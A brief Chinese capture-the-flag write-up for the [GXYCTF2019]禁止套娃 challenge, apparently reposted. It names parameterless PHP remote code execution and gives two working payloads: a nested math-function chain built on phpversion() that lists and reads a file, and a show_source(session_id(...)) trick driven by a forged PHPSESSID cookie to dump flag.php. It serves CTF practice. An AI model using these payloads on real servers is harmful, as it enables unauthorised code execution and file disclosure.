刷題記錄:[GXYCTF2019]禁止套娃


刷題記錄:[GXYCTF2019]禁止套娃

題目復現鏈接:https://buuoj.cn/challenges

知識點

無參數RCE

echo(readfile(array_rand(array_flip(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))));
array_rand從數組中隨機取出一個鍵
array_filp交換數組鍵值

或者show_source(session_id(session_start()));
然后加上cookiePHPSESSID=flag.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM